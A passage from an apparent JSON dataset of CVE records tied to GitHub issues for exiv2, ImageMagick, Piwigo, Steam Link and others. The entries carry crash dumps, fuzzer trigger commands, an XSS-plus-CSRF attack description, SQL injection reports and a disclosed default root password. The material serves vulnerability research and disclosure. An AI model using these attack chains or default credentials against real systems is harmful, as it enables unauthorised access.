NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [ra NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG cmp al NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG a APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG jne NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned ch ar const , unsigned long, unsigned int NUMBERTAG ffff NUMBERTAG c NUMBERTAG c APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov eax,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov rdx,QWORD PTR [rbp NUMBERTAG b8] [ stack NUMBERTAG fffffff2c NUMBERTAG ff7fe NUMBERTAG fffffff2c NUMBERTAG f NUMBERTAG fffffff2c NUMBERTAG e NUMBERTAG a NUMBERTAG fffffff2c NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG e NUMBERTAG ffff NUMBERTAG afb0 APITAG mov rax,QWORD PTR [rip NUMBERTAG d NUMBERTAG ffff NUMBERTAG cb NUMBERTAG fffffff2c NUMBERTAG fffffff2c NUMBERTAG f1fef NUMBERTAG e NUMBERTAG fffffff2c NUMBERTAG ff8 ('.' <repeats NUMBERTAG times NUMBERTAG fffffff2c NUMBERTAG ffffbad NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG c NUMBERTAG in APITAG (out=..., bytes NUMBERTAG e NUMBERTAG I \", size NUMBERTAG f4, depth NUMBERTAG f) at APITAG NUMBERTAG while ( bytes[i NUMBERTAG c && i APITAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG ERRORTAG RDI NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG e NUMBERTAG ffff NUMBERTAG afb0 APITAG mov rax,QWORD PTR [rip NUMBERTAG d NUMBERTAG ffff NUMBERTAG cb8) RBP NUMBERTAG fffffffd NUMBERTAG fffffffdb NUMBERTAG fffffffdd NUMBERTAG fffffffdf NUMBERTAG fffffffdf NUMBERTAG fffffffdfe0 ( > ...) RSP NUMBERTAG fffffffd8a NUMBERTAG f7fe NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [rax]) R NUMBERTAG R NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG ERRORTAG R NUMBERTAG e ('^') R NUMBERTAG R NUMBERTAG ffff NUMBERTAG a2ac NUMBERTAG ASCII') R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov edx,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov rax,QWORD PTR [rbp NUMBERTAG b NUMBERTAG ffff NUMBERTAG bf3e APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG add rax,rd NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [ra NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG cmp al NUMBERTAG c NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG jne NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG add DWORD PTR [rbp NUMBERTAG bc NUMBERTAG ffff NUMBERTAG bf4f APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov edx,DWORD PTR [rbp NUMBERTAG bc] [ stack NUMBERTAG fffffffd8a NUMBERTAG f7fe NUMBERTAG fffffffd8a NUMBERTAG fffffffd8b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG ERRORTAG NUMBERTAG fffffffd8b NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG e NUMBERTAG ffff NUMBERTAG afb0 APITAG mov rax,QWORD PTR [rip NUMBERTAG d NUMBERTAG ffff NUMBERTAG cb NUMBERTAG fffffffd8c NUMBERTAG fffffffd8c NUMBERTAG ff0f6d NUMBERTAG fffffffd8d NUMBERTAG d NUMBERTAG b0c NUMBERTAG fffffffd8d NUMBERTAG ffffbad NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG bf NUMBERTAG in APITAG (out=..., bytes NUMBERTAG d NUMBERTAG I PATHTAG size NUMBERTAG depth NUMBERTAG at APITAG NUMBERTAG while ( i APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at libc APITAG NUMBERTAG dee9 in _start () ================== the pocs please refer to : URLTAG URLTAG",
  11137. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11138. "severity": "MEDIUM",
  11139. "baseScore": 6.5,
  11140. "impactScore": 3.6,
  11141. "exploitabilityScore": 2.8
  11142. },
  11143. {
  11144. "CVE_ID": "CVE-2017-17725",
  11145. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/188",
  11146. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/188",
  11147. "Repo_new": "exiv2/exiv2",
  11148. "Issue_Created_At": "2017-12-12T14:27:30Z",
  11149. "description": "exi NUMBERTAG library: heap buffer overflow in APITAG APITAG Description on exi NUMBERTAG the latest version): there is a heap based buffer overflow in the APITAG function APITAG which can be triggered by crafted tiff file. Note that this vulnerability is different from CVETAG (issue NUMBERTAG which is a an invalid memory address dereference. PATHTAG APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG f NUMBERTAG f NUMBERTAG de bp NUMBERTAG ffee NUMBERTAG c NUMBERTAG sp NUMBERTAG ffee NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG f NUMBERTAG f NUMBERTAG dd in APITAG char const , APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG d2c in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e2e7 in APITAG std::char_traits APITAG , std::allocator APITAG > const&) PATHTAG NUMBERTAG c NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG cd NUMBERTAG in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG faed6b2 in operator APITAG long) ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG char const , APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING APITAG APITAG FILETAG Author Credit to Wei You, please contact EMAILTAG for more details.",
  11150. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11151. "severity": "MEDIUM",
  11152. "baseScore": 6.5,
  11153. "impactScore": 3.6,
  11154. "exploitabilityScore": 2.8
  11155. },
  11156. {
  11157. "CVE_ID": "CVE-2017-17760",
  11158. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10351",
  11159. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10351",
  11160. "Repo_new": "opencv/opencv",
  11161. "Issue_Created_At": "2017-12-19T11:26:43Z",
  11162. "description": "Buffer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Detailed description A buffer overflow occurs in function APITAG in file APITAG . The crash details as follows: ERRORTAG Steps to reproduce Please refer to the following url for the testcases: URLTAG url",
  11163. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11164. "severity": "MEDIUM",
  11165. "baseScore": 6.5,
  11166. "impactScore": 3.6,
  11167. "exploitabilityScore": 2.8
  11168. },
  11169. {
  11170. "CVE_ID": "CVE-2017-17774",
  11171. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/822",
  11172. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/822",
  11173. "Repo_new": "piwigo/piwigo",
  11174. "Issue_Created_At": "2017-12-17T16:44:07Z",
  11175. "description": "vulnerability\uff1ause xss+csrf attack to control the admin panel. Well, sir , I just found some vulnerabilities in Piwigo NUMBERTAG I'll show you the details here. First, the admin panel left no csrf protect\uff0cthen we can pishing the admin to vist a webpage in evil site, which contain csrf attack content. Because of some xss vulnerabilities in the admin panel, we can combine xss and csrf successfully. For example, we get a webpage here , which left an stored xss vulnerability. APITAG When the admin user was cheated to visit the evil page url\uff1a APITAG Now the admin user suffered a csrf attack , and writed evil xss content into the site APITAG by himself. The evil poc APITAG will be like this: CODETAG Then we've attacked the admin user by xss successfully, without trying to login by ourself . Altogether\uff0c we should filter the evil character at output points, even in the admin panel . And adding csrf token to important operation in the admin panel is also necessary, because it may cause something more seriously at other points. FILETAG FILETAG Wish your response , sir~",
  11176. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11177. "severity": "HIGH",
  11178. "baseScore": 8.8,
  11179. "impactScore": 5.9,
  11180. "exploitabilityScore": 2.8
  11181. },
  11182. {
  11183. "CVE_ID": "CVE-2017-17792",
  11184. "Issue_Url_old": "https://github.com/BlogoText/blogotext/issues/345",
  11185. "Issue_Url_new": "https://github.com/blogotext/blogotext/issues/345",
  11186. "Repo_new": "blogotext/blogotext",
  11187. "Issue_Created_At": "2017-11-17T02:02:14Z",
  11188. "description": "some vulns found in version NUMBERTAG I have found some vulns in version NUMBERTAG Is there some more private, more security way to contact with you? like a email or so.",
  11189. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  11190. "severity": "MEDIUM",
  11191. "baseScore": 6.1,
  11192. "impactScore": 2.7,
  11193. "exploitabilityScore": 2.8
  11194. },
  11195. {
  11196. "CVE_ID": "CVE-2017-17822",
  11197. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/823",
  11198. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/823",
  11199. "Repo_new": "piwigo/piwigo",
  11200. "Issue_Created_At": "2017-12-18T12:57:57Z",
  11201. "description": "SQL injection in admin/users. By using field APITAG you can inject unexpected content to the database. This security issue is not \"critical\" because it requires access to administration, but should be fixed anyway.",
  11202. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  11203. "severity": "MEDIUM",
  11204. "baseScore": 4.9,
  11205. "impactScore": 3.6,
  11206. "exploitabilityScore": 1.2
  11207. },
  11208. {
  11209. "CVE_ID": "CVE-2017-17823",
  11210. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/826",
  11211. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/826",
  11212. "Repo_new": "piwigo/piwigo",
  11213. "Issue_Created_At": "2017-12-18T16:09:04Z",
  11214. "description": "SQL injection in configuration setting. The configuration setting \"order by\" can receive an SQL injection. This vulnerability is not considered as critical because it requires admin access to be exploited.",
  11215. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  11216. "severity": "MEDIUM",
  11217. "baseScore": 4.9,
  11218. "impactScore": 3.6,
  11219. "exploitabilityScore": 1.2
  11220. },
  11221. {
  11222. "CVE_ID": "CVE-2017-17824",
  11223. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/825",
  11224. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/825",
  11225. "Repo_new": "piwigo/piwigo",
  11226. "Issue_Created_At": "2017-12-18T15:43:58Z",
  11227. "description": "SQL injection on Batch Manager, unit mode. The Batch Manager has a SQL injection vulnerability. The bug is not critical because it requires administration access to be exploited, but needs to be fixed anyway.",
  11228. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  11229. "severity": "MEDIUM",
  11230. "baseScore": 4.9,
  11231. "impactScore": 3.6,
  11232. "exploitabilityScore": 1.2
  11233. },
  11234. {
  11235. "CVE_ID": "CVE-2017-17877",
  11236. "Issue_Url_old": "https://github.com/ValveSoftware/steamlink-sdk/issues/119",
  11237. "Issue_Url_new": "https://github.com/valvesoftware/steamlink-sdk/issues/119",
  11238. "Repo_new": "ValveSoftware/steamlink-sdk",
  11239. "Issue_Created_At": "2017-12-23T23:24:22Z",
  11240. "description": "IP NUMBERTAG Firewall Needed. Given that NUMBERTAG silently truncates passwords to NUMBERTAG characters, having SSHD bind to all IP addresses isn't a great idea. This isn't much of a risk with most home networks due to IP NUMBERTAG NAT ( URLTAG but those with IP NUMBERTAG will end up having their Steam Link accessible on the internet if there's no incoming firewall. FILETAG We really do need iptables / ip6tables. ERRORTAG",
  11241. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11242. "severity": "CRITICAL",
  11243. "baseScore": 9.8,
  11244. "impactScore": 5.9,
  11245. "exploitabilityScore": 3.9
  11246. },
  11247. {
  11248. "CVE_ID": "CVE-2017-17878",
  11249. "Issue_Url_old": "https://github.com/ValveSoftware/steamlink-sdk/issues/110",
  11250. "Issue_Url_new": "https://github.com/valvesoftware/steamlink-sdk/issues/110",
  11251. "Repo_new": "ValveSoftware/steamlink-sdk",
  11252. "Issue_Created_At": "2017-11-05T15:06:49Z",
  11253. "description": "Only first NUMBERTAG characters of password are checked. Only first NUMBERTAG chars of password are checked for validity when connecting over ssh. Reproduce NUMBERTAG ssh to steamlink NUMBERTAG for defaultpassword 'steamlin' is sufficient NUMBERTAG change password with 'passwd' to a long password over NUMBERTAG chars. (e.g NUMBERTAG log out NUMBERTAG login with first NUMBERTAG characters of new password and any arbitrary characters after that. (e.g NUMBERTAG",
  11254. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11255. "severity": "CRITICAL",
  11256. "baseScore": 9.8,
  11257. "impactScore": 5.9,
  11258. "exploitabilityScore": 3.9
  11259. },
  11260. {
  11261. "CVE_ID": "CVE-2017-17878",
  11262. "Issue_Url_old": "https://github.com/ValveSoftware/steamlink-sdk/issues/101",
  11263. "Issue_Url_new": "https://github.com/valvesoftware/steamlink-sdk/issues/101",
  11264. "Repo_new": "ValveSoftware/steamlink-sdk",
  11265. "Issue_Created_At": "2017-08-12T09:05:29Z",
  11266. "description": "Default root password is not steamlink NUMBERTAG The default root password when enabling and connecting to the Steam Link with ssh is not \"steamlink NUMBERTAG it is \"steamlin\". Please change this is in the documentation, or change the password.",
  11267. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11268. "severity": "CRITICAL",
  11269. "baseScore": 9.8,
  11270. "impactScore": 5.9,
  11271. "exploitabilityScore": 3.9
  11272. },
  11273. {
  11274. "CVE_ID": "CVE-2017-17879",
  11275. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/906",
  11276. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/906",
  11277. "Repo_new": "imagemagick/imagemagick",
  11278. "Issue_Created_At": "2017-12-21T07:57:04Z",
  11279. "description": "heap buffer overflow in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert heap buffer overflow APITAG /dev/null ERRORTAG tesecase: URLTAG",
  11280. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11281. "severity": "HIGH",
  11282. "baseScore": 8.8,
  11283. "impactScore": 5.9,
  11284. "exploitabilityScore": 2.8
  11285. },
  11286. {
  11287. "CVE_ID": "CVE-2017-17880",
  11288. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/907",
  11289. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/907",
  11290. "Repo_new": "imagemagick/imagemagick",
  11291. "Issue_Created_At": "2017-12-21T08:52:20Z",
  11292. "description": "stack buffer overflow in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert stack buffer overflow NUMBERTAG dev/null ERRORTAG testcase: URLTAG",
  11293. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11294. "severity": "HIGH",
  11295. "baseScore": 8.8,
  11296. "impactScore": 5.9,
  11297. "exploitabilityScore": 2.8
  11298. },
  11299. {
  11300. "CVE_ID": "CVE-2017-17881",
  11301. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/878",
  11302. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/878",
  11303. "Repo_new": "imagemagick/imagemagick",
  11304. "Issue_Created_At": "2017-11-24T05:58:35Z",
  11305. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
  11306. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11307. "severity": "MEDIUM",
  11308. "baseScore": 6.5,
  11309. "impactScore": 3.6,
  11310. "exploitabilityScore": 2.8
  11311. },
  11312. {
  11313. "CVE_ID": "CVE-2017-17882",
  11314. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/880",
  11315. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/880",
  11316. "Repo_new": "imagemagick/imagemagick",
  11317. "Issue_Created_At": "2017-11-24T06:17:05Z",
  11318. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
  11319. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11320. "severity": "MEDIUM",
  11321. "baseScore": 6.5,
  11322. "impactScore": 3.6,
  11323. "exploitabilityScore": 2.8
  11324. },
  11325. {
  11326. "CVE_ID": "CVE-2017-17883",
  11327. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/877",
  11328. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/877",
  11329. "Repo_new": "imagemagick/imagemagick",
  11330. "Issue_Created_At": "2017-11-24T05:49:54Z",
  11331. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase\uff1a URLTAG",
  11332. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11333. "severity": "MEDIUM",
  11334. "baseScore": 6.5,
  11335. "impactScore": 3.6,
  11336. "exploitabilityScore": 2.8
  11337. },
  11338. {
  11339. "CVE_ID": "CVE-2017-17884",
  11340. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/902",
  11341. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/902",
  11342. "Repo_new": "imagemagick/imagemagick",
  11343. "Issue_Created_At": "2017-12-19T07:22:34Z",
  11344. "description": "memory leaks in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert 'memory leaks APITAG /dev/null ERRORTAG testcase: FILETAG ~",
  11345. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11346. "severity": "MEDIUM",
  11347. "baseScore": 6.5,
  11348. "impactScore": 3.6,
  11349. "exploitabilityScore": 2.8
  11350. },
  11351. {
  11352. "CVE_ID": "CVE-2017-17885",
  11353. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/879",
  11354. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/879",
  11355. "Repo_new": "imagemagick/imagemagick",
  11356. "Issue_Created_At": "2017-11-24T06:05:28Z",
  11357. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
  11358. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11359. "severity": "MEDIUM",
  11360. "baseScore": 6.5,
  11361. "impactScore": 3.6,
  11362. "exploitabilityScore": 2.8
  11363. },
  11364. {
  11365. "CVE_ID": "CVE-2017-17886",
  11366. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/874",
  11367. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/874",
  11368. "Repo_new": "imagemagick/imagemagick",
  11369. "Issue_Created_At": "2017-11-23T01:41:28Z",
  11370. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
  11371. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11372. "severity": "MEDIUM",
  11373. "baseScore": 6.5,
  11374. "impactScore": 3.6,
  11375. "exploitabilityScore": 2.8
  11376. },
  11377. {
  11378. "CVE_ID": "CVE-2017-17887",
  11379. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/903",
  11380. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/903",
  11381. "Repo_new": "imagemagick/imagemagick",
  11382. "Issue_Created_At": "2017-12-19T07:29:18Z",
  11383. "description": "memory leaks in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert memory leaks APITAG /dev/null ERRORTAG FILETAG",
  11384. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11385. "severity": "MEDIUM",
  11386. "baseScore": 6.5,
  11387. "impactScore": 3.6,
  11388. "exploitabilityScore": 2.8
  11389. },
  11390. {
  11391. "CVE_ID": "CVE-2017-17914",
  11392. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/908",
  11393. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/908",
  11394. "Repo_new": "imagemagick/imagemagick",
  11395. "Issue_Created_At": "2017-12-22T02:21:06Z",
  11396. "description": "CPU and Memory exhaustion. Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU and Memory consumption. (CPU NUMBERTAG Memory NUMBERTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib The FILETAG is as following CODETAG Trigger Command: magick convert ./cpu memory exhaustion mng /dev/null Be careful, please monitor the memory percentage, I had to reboot my computer a few minutes ago. Debug When debug we found the program is always in a while loop APITAG ERRORTAG testcase: URLTAG",
  11397. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11398. "severity": "MEDIUM",
  11399. "baseScore": 6.5,
  11400. "impactScore": 3.6,
  11401. "exploitabilityScore": 2.8
  11402. },
  11403. {
  11404. "CVE_ID": "CVE-2017-17934",
  11405. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/920",
  11406. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/920",
  11407. "Repo_new": "imagemagick/imagemagick",
  11408. "Issue_Created_At": "2017-12-26T07:56:41Z",
  11409. "description": "memory leaks in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib magick convert Memory Leak APITAG NUMBERTAG msl ERRORTAG testcase: URLTAG",
  11410. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11411. "severity": "MEDIUM",
  11412. "baseScore": 6.5,
  11413. "impactScore": 3.6,
  11414. "exploitabilityScore": 2.8
  11415. },
  11416. {
  11417. "CVE_ID": "CVE-2017-17971",
  11418. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/8000",
  11419. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/8000",
  11420. "Repo_new": "dolibarr/dolibarr",
  11421. "Issue_Created_At": "2017-12-29T14:19:38Z",
  11422. "description": "XSS by using \"onclick\". Bug FILETAG FILETAG Fix Add the \"onclick\"\u3001\"onscroll\" in the black list, and escape the \"<\",etc.",
  11423. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  11424. "severity": "MEDIUM",
  11425. "baseScore": 6.1,
  11426. "impactScore": 2.7,
  11427. "exploitabilityScore": 2.8
  11428. },
  11429. {
  11430. "CVE_ID": "CVE-2017-18005",
  11431. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/168",
  11432. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/168",
  11433. "Repo_new": "exiv2/exiv2",
  11434. "Issue_Created_At": "2017-11-18T22:24:23Z",
